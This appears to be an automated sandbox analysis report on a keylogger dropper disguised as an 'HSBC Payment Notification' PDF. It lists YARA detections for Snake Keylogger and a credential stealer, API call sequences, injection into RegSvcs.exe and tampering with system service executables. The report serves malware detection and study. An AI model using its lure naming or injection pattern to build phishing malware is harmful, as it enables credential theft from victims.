              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

System Summary

Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: This is a third-party compiled AutoIt script. (0_2_00403B3A)
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000000.1308905605.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_e20a479e-2
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000000.1308905605.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e86999f3-6
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_f606d827-e
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7b6891e2-3
Source: initial sample | Static PE information: Filename: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F18140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CreateFileW,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_00988140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CreateFileW,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\9624e934681120d9.bin
Source: C:\Windows\System32\wbengine.exe | File created: C:\Windows\Logs\WindowsBackup
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0040E6A0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0042D975
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0040FCE0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004221C5
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004362D2
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004803DA
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0043242E
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004225FA
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0045E616
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004166E1
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0043878F
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00436844
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00480857
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00418808
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00468889
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0042CB21
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00436DB6
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00416F9E
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00413030
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0042F1D9
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00423187
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00401287
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00421484
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00415520
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00427696
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00415760
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00421978
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00439AB5
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004E9CC8
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00487DDB
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00421D90
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0042BDA6
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0040DF00
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00413FE0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00AC28E8
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F162E0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F1A350
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F18140
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F4F080
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F54766
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F3E570
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F20A10
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F20B70
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F4CB10
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F17E70
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F52F33
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F44F10
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F4BD80
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_02F42D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B44328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4B590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B427B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B45968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B48DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B42DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B45F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4F1F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4F1E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4E4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4E4E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4B57F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4F788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4F778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4E938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4E948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4EDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00B4ED91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D64560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D699B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D60040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D64BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D69360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D67D97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6D580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D67DA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6BD5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6D574
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6BD68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6B4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6AC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6EF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6EF82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6A7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6A7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D68F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6E6D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D68EFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D68658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D68648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6DE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6DE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6D9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6D9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D681F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6B902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6D128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D698B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6F840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6B060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D60007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6F830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6D038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6F3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6ABFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6F3E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D63BB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D63BA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D69353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D64340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6EB38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6EB29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6E288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D68AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D68AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D6E278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_05D68200
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 11_2_009C2ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 12_2_022B2ED0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Code function: 14_2_00BC2ED0
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_00988140
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_009BF080
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_009862E0
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_00990A10
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_009BCB10
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_0098A350
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_00990B70
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_009BBD80
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_009B2D10
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_00987E70
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_009B4F10
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 16_2_009C2F33
Source: C:\Windows\System32\Spectrum.exe | Code function: 20_2_00752ED0
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Code function: 22_2_00D42ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Security
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: String function: 00428900 appears 42 times
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: String function: 00420AE3 appears 70 times
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: elevation_service.exe.4.dr | Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.4.dr | Static PE information: Number of sections : 11 > 10
Source: elevation_service.exe0.4.dr | Static PE information: Number of sections : 12 > 10
Source: firefox.exe.4.dr | Static PE information: Number of sections : 11 > 10
Source: setup.exe.4.dr | Static PE information: Number of sections : 13 > 10
Source: msedgewebview2.exe.4.dr | Static PE information: Number of sections : 14 > 10
Source: msedge_pwa_launcher.exe.4.dr | Static PE information: Number of sections : 13 > 10
Source: chrome_proxy.exe.4.dr | Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.4.dr | Static PE information: Number of sections : 12 > 10
Source: identity_helper.exe.4.dr | Static PE information: Number of sections : 12 > 10
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1324471492.000000000438D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1319525137.00000000041E3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1317022213.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameALG.exej% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1313006150.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearmsvc.exeN vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
